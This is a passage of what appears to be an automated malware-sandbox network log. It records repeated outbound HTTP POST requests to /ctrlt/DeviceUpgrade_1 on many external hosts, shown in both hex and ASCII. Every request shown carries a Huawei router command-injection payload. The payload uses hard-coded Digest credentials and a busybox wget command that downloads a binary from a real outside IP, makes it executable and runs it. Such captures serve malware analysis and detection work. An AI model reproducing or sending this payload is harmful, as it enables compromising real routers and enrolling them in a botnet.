                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1028192.168.2.155473041.179.183.21937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912081957 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1029192.168.2.156068241.133.188.11337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912161112 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1030192.168.2.155689241.203.53.8937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912193060 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1031192.168.2.154966841.119.227.20137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912194014 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1032192.168.2.154907841.31.20.337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912194967 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1033192.168.2.154357841.246.53.17737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912211895 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1034192.168.2.156039441.149.40.1937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912292004 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1035192.168.2.155670841.5.133.19237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912292957 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1036192.168.2.153838841.120.137.1737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912347078 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1037192.168.2.154804441.144.96.14837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912347078 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 